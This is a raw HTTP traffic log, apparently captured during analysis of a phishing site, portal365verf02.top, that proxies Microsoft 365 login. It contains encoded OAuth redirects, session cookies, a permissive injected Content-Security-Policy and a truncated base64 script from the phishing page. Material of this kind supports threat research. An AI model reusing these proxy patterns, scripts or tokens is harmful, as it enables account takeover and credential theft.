2025-01-15 19:06:17 UTC	2312	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js HTTP/1.1 Host: portal365verf02.top Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFf Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg; esctx-OFqAPL29z84=AQABCQEAAABVrSpeuWamRam2jAF1XRQE5h82xGeHckVGKkySRRogG7y3RcgP1NzaLAv6MVqqQHILtlUZgZuqhjw4blCcVmARyZfPjwA9uhvyHRkcqFkAm5Amyy2NjQ6W3zhBiPvKFVbWrPuNv8lXuw-ERP6zvoOMYeFAtLuwwo2pUBgn5KL40SAA; fpc=AjvhwliVw9dNlIW6imzLc3s; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEOkhehSc-09HLhxSuCxZ96KBemtrxznJFXB5yGpKeiSYX1utvWatE-rPaDWkBB1Qp1qddzOAP5W4RLWXf4xiXZNLtUptmX8o-SfbjLUcnXnmg4-IVw6JuPKmnRUlgFFmTCaTmu41lpRXjXe6cYSvEMvEo9sJyZYTQWH3FXFqvZd0gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
2025-01-15 19:06:18 UTC	1413	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:06:18 GMT Content-Type: application/x-javascript content-length: 142542 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Thu, 12 Dec 2024 21:33:52 GMT ETag: 0x8DD1AF4AC8A4BB0 x-ms-request-id: 66e994fb-e01e-0001-5880-679c8a000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20250115T190618Z-178d69474547wjlrhC1AMSnp680000000ht000000000ng3f x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2025-01-15 19:06:18 UTC	14971	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 cc cc 2e b0 5c 4e ac 80 bb 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 5f c4 38 89 2b 53 3f 4e a0 d0 48 4c c3 c7 4a 15 aa 8b bc ca a9 1b 25 4f 95 c3 53 b3 0e f5 0b a8 cd bf f5 03 28 3d 0e 67 4f f0 7c 97 54 82 30 f1 c7 a2 e2 06 1e d5 36 85 97 20 16 95 79 e0 89 a8 f2 78 e7 8f ef 2a c7 fe 38 0a e3 70 92 54 22 31 16 Data Ascii: m[80OL;wa.\Nhr~=,JUT~l?y2X9\|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDe_8+S?NHLJ%OS(=gO\|T06 yx*8pT"1
2025-01-15 19:06:18 UTC	1413	IN	Data Raw: 4a 3b 9e 47 c2 c6 55 bd 94 a5 a2 db 18 13 5a 6a 0b a2 bd 0b d0 ca e4 de a5 8d fb 23 66 71 78 61 8a e5 b0 5e 29 97 d4 b6 d9 b6 d8 b2 4e cf 06 83 8f ce 33 c5 f4 3f 93 ab 0e 70 a0 62 ed 80 e4 d0 b5 d0 56 fa 11 51 f1 70 08 c4 35 fc 75 d8 03 2a d2 c7 97 76 2c 02 25 7d f0 a3 e4 ce 03 69 be 47 a1 67 b9 d9 92 c9 48 46 05 d3 36 86 a6 8c 7c 3d c7 c8 e0 04 e9 67 a9 d0 6f 2d 24 a5 f3 c7 10 cc 47 b2 1c 90 94 f8 15 5b d7 64 62 46 39 8c 5b 78 34 5a 2c 04 af 62 50 2d 6a 1b 6e c0 91 b2 18 37 ab 1c 88 b4 84 d1 a2 7d 17 71 48 73 18 68 d1 62 2a f0 52 e0 27 0c a3 e5 0f 6f b4 49 66 ed f3 ed 2d 4c 17 44 30 86 9b e9 d6 9b 5f 20 a5 53 c1 c3 4f 62 91 38 f3 64 b2 b1 cb 7b 65 2e a2 69 3f c0 55 1c 2f 5f e0 db c6 e3 e3 e3 06 52 c6 c6 3c 9a 0a 06 21 1a c1 dd 1c ca 97 e3 3c a7 dc d8 50 Data Ascii: J;GUZj#fqxa^)N3?pbVQp5uv,%}iGgHF6\|=go-$G[dbF9[x4Z,bP-jn7}qHshbR'oIf-LD0_ SOb8d{e.i?U/_R<!<P
2025-01-15 19:06:18 UTC	7575	IN	Data Raw: 05 f8 97 ee 5d 31 0b a7 17 56 8d 24 25 02 4a 60 b7 86 81 b7 ad 24 f5 d2 3c 67 0d 38 21 d1 da e9 e8 2f 2f 2f 91 76 66 54 1d 35 34 eb f9 01 e6 38 94 7d 53 1b 9a c4 75 aa ae 24 0b d9 0f 39 65 e0 75 f7 1f c2 6f ff 6d af ee d2 d3 a5 64 57 b2 04 27 d2 ce 9e aa e3 94 88 dd 41 89 7e e4 df fb a0 03 b1 72 85 1b d5 71 6a fb fd 4e 2d 3f c5 c3 24 9c 19 ab d0 2e 6f 5f e3 cc c3 c3 ff b4 1f 2b 9a 89 67 62 fd 10 9e 72 cd 50 5b c1 ff bf 6d 0b 1e d3 f5 97 db 22 41 f9 3e b5 1c 09 ac 10 f5 cf 8a 4f 84 ce 1f 41 19 7d 65 0d b5 93 ee d2 e8 da 4b 8d 27 92 e3 4b e7 50 fb 5a 12 88 aa 61 80 0a e3 fb 60 86 95 97 c4 a1 92 c4 e1 65 a2 24 71 a8 4b 62 d3 ca a4 84 e3 55 0d f5 6c c8 0c de a0 06 72 c8 a5 5a 75 b8 b2 2c 2a 46 72 8a ec 38 e9 3d c0 02 4b 89 19 68 3f 50 ee cf 02 fa f1 6c 54 f3 Data Ascii: ]1V$%J`$<g8!///vfT548}Su$9euomdW'A~rqjN-?$.o_+gbrP[m"A>OA}eK'KPZa`e$qKbUlrZu,*Fr8=Kh?PlT
2025-01-15 19:06:18 UTC	8809	IN	Data Raw: b7 b9 77 ef 6f db 48 d2 46 ff 3f 9f 82 c2 fa 67 03 21 04 4b 4e 32 93 80 46 f8 73 64 7b e2 4c 7c 59 4b 4e 32 23 6b b4 20 01 4a b0 28 80 03 80 b2 35 12 bf fb a9 a7 aa bb d1 b8 50 76 66 e7 9c f7 9d dd 58 20 d0 68 f4 b5 ba ae 4f d9 cf fc 3a f8 14 43 87 ce 8c 5d e8 a2 79 f3 39 cb fa 54 d4 18 08 f8 bd 54 11 0f 51 f0 0b d1 21 72 26 04 42 13 0a 66 12 85 cc 80 77 f4 df d8 e1 27 36 24 08 48 d0 51 1c 68 e9 4b 4c cc 44 11 79 68 de 44 37 5d 9a 0e e0 ab 2d dc 0b 35 6e e3 7f 6a ad 46 3e 16 fa a2 8f 2a 4d b4 15 89 34 04 48 ee ee a2 b0 76 ff a1 9a db 47 39 13 f8 ad 14 f7 8d 1e 3c ee f4 51 84 89 0f 5e c6 ca 83 47 c1 76 38 93 37 c7 47 27 fc 8c 8a bf 8e 3a 14 c8 4d 87 04 6a 98 ad e9 2d 8f 03 09 23 54 20 57 34 17 f4 3d 3c 69 91 2a 05 8a 3c 52 a7 62 7d 1e d7 23 a0 76 57 a3 65 Data Ascii: woHF?g!KN2Fsd{L\|YKN2#k J(5PvfX hO:C]y9TTQ!r&Bfw'6$HQhKLDyhD7]-5njF>M4HvG9<Q^Gv87G':Mj-#T W4=<i<Rb}#vWe
2025-01-15 19:06:18 UTC	16384	IN	Data Raw: f2 fb 53 ee 81 75 50 e6 42 b8 d4 e8 98 fb ad e1 71 79 89 b2 f7 cd 46 65 5f 72 44 eb da 1c 76 93 2e 13 a0 f7 a9 9c fb fa 57 9f 59 c8 aa b7 0d c5 50 84 a2 5f aa d9 f7 4e 87 0e f4 cb 2a da 2c 5c a5 a3 88 80 67 33 3a 62 de b3 1f 24 49 14 df c5 98 c8 94 97 3d 6f 3b 96 84 11 81 a2 93 98 0d 7a 97 95 d0 53 0c 78 97 f9 ad 78 20 49 21 5a 44 ae 28 77 fe 12 bb e5 20 68 1f 54 fa 75 cb e2 a4 c0 76 fa 6f 68 5b e4 95 05 ff 2c 5a 76 54 22 39 23 87 0d fa 70 f1 05 fd 92 7c 92 1c 9c 03 c7 e1 b6 40 e2 31 95 e5 36 20 f5 70 13 32 ff 85 92 a0 03 bb 06 23 eb 14 6c e2 88 ca 26 a4 fe 06 37 c2 9b cd 66 73 87 13 e3 80 71 5b f3 4d d6 e9 c5 1e e3 b0 31 d7 26 c6 d2 d9 c5 67 4d 02 28 50 37 b5 07 14 41 3a a1 6d e9 d0 e1 76 7b fb dd 0f 3a e4 38 d5 44 0f 14 cf f0 4b fa 78 b3 d4 13 46 45 aa Data Ascii: SuPBqyFe_rDv.WYP_N*,\g3:b$I=o;zSxx I!ZD(w hTuvoh[,ZvT"9#p\|@16 p2#l&7fsq[M1&gM(P7A:mv{:8DKxFE
2025-01-15 19:06:18 UTC	795	IN	Data Raw: 68 b4 f9 f9 ee 17 1d dc c0 0a 71 b9 86 c1 14 0f 8c bf f3 a5 75 21 c9 0f 1d 36 2d 04 9b 6b 49 31 a0 c8 c2 60 02 c2 82 58 87 8c 58 07 a4 92 91 fc 11 f0 1f 28 c4 35 cb 22 ea 51 26 b7 ec 2d 09 d0 17 dc d3 ce 6c fd cc 26 4e 9f 38 f3 36 c6 f9 55 60 39 7b 63 07 d6 50 37 e3 1f 9a 0c b1 1b e4 38 72 46 ae b2 96 da a6 c2 d8 43 bc 31 08 8b fe ba ed 6d 37 d0 86 57 4f 1c c1 fe 06 3b cb 25 e3 45 ca 4a 23 c6 f0 c0 87 6e 9d 71 a1 9c a4 e3 e9 80 d7 71 fb fb 1e bb 9a e1 4c 1f aa b3 f6 54 eb a9 d2 da f8 a5 a4 1c 4e ac 3d a4 92 ed fc e5 be f2 ea 02 7f a9 18 4b 20 3d a8 ed 33 e8 65 a5 0d 4c 0a 93 99 78 4f a4 b2 cf 89 cf 2c 7b dc a5 fe d0 90 3c db 83 fa 6f 67 44 c7 1b 85 45 0d f8 59 36 ec 5a af 5e dd c6 79 e5 ae 51 e8 28 53 58 9f 4b d1 f3 37 d4 d2 dd 7c 52 75 8e 2a eb e3 5a 1b Data Ascii: hqu!6-kI1`XX(5"Q&-l&N86U`9{cP78rFC1m7WO;%EJ#nqqLTN=K =3eLxO,{<ogDEY6Z^yQ(SXK7\|Ru*Z

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:19 UTC	3367	OUT	GET /?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFf&sso_reload=true HTTP/1.1 Host: portal365verf02.top Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFf Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg; esctx-OFqAPL29z84=AQABCQEAAABVrSpeuWamRam2jAF1XRQE5h82xGeHckVGKkySRRogG7y3RcgP1NzaLAv6MVqqQHILtlUZgZuqhjw4blCcVmARyZfPjwA9uhvyHRkcqFkAm5Amyy2NjQ6W3zhBiPvKFVbWrPuNv8lXuw-ERP6zvoOMYeFAtLuwwo2pUBgn5KL40SAA; fpc=AjvhwliVw9dNlIW6imzLc3s; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEOkhehSc-09HLhxSuCxZ96KBemtrxznJFXB5yGpKeiSYX1utvWatE-rPaDWkBB1Qp1qddzOAP5W4RLWXf4xiXZNLtUptmX8o-SfbjLUcnXnmg4-IVw6JuPKmnRUlgFFmTCaTmu41lpRXjXe6cYSvEMvEo9sJyZYTQWH3FXFqvZd0gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
2025-01-15 19:06:19 UTC	4369	IN	HTTP/1.1 302 Found Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTF [TRUNCATED] Strict-Transport-Security: max-age=31536000; includeSubDomains P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: f784dc00-0e3d-41e6-8b02-34f61e4f1d00 x-ms-ests-server: 2.1.19870.3 - FRC ProdSlices nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-5je70-fvUfDtWINzbMFqiw' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All Set-Cookie: buid=1.AR8AMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAAfAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEFfWmjkR_GzAYDvO4lGAIMzWpVc_PlZ-ozf6HQiq48f64FiPX3lFGiNrTu1VIml9tFq1YxnCwjLh5luX0UaBFQIcOLXSo71dbHPXGQl2vLxYgAA; expires=Fri, 14-Feb-2025 19:06:19 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx-vhNytzdk0nc=AQABCQEAAABVrSpeuWamRam2jAF1XRQEFgDzv8ukcfD-wYY283EvFwHXMp64hyrMqAFOeDXvB17KygLJKwOLURuNuyH493AgdDK3GCMWssWSXqb-v87XeuFeoOyIRYB2JyhEeLjGLQyJPClevL6yyf3ns-tUqgzF1vDHVEW_335igdCZD0QCFyAA; domain=portal365verf02.top; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=AjvhwliVw9dNlIW6imzLc3uerOTJAQAAACv-Gd8OAAAA; expires=Fri, 14-Feb-2025 19:06:19 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: cltm=CgAQABoAIgQIDBAF; domain=portal365verf02.top; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Date: Wed, 15 Jan 2025 19:06:19 GMT Connection: close content-length: 1922 Content-Security-Policy: default-src data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2025-01-15 19:06:19 UTC	1922	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 4e 31 62 57 56 75 64 43 35 6f 5a 57 46 6b 4c 6d 46 77 63 47 56 75 5a 45 4e 6f 61 57 78 6b 4b 45 39 69 61 6d 56 6a 64 43 35 68 63 33 4e 70 5a 32 34 6f 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 33 4a 6c 59 58 52 6c 52 57 78 6c 62 57 56 75 64 43 67 69 5a 47 6c 32 49 69 6b 73 65 Data Ascii: <html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:19 UTC	2338	OUT	GET /favicon.ico HTTP/1.1 Host: portal365verf02.top Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFf Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=ftYHT3GSqGuC; qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; ClientId=B36E874E085E45BDA840ECB68DEA73E1; OIDC=1; OpenIdConnect.nonce.v3.yM_C4uEFBsmjVgR5nmH6J9WRuWSRb_jSHnByoTdpqUU=638725647761308227.2a3c6ba0-1fc4-4994-90c0-543ef05cb9e5; X-OWA-RedirectHistory=ArLym14BQ3q-r5c13Qg; 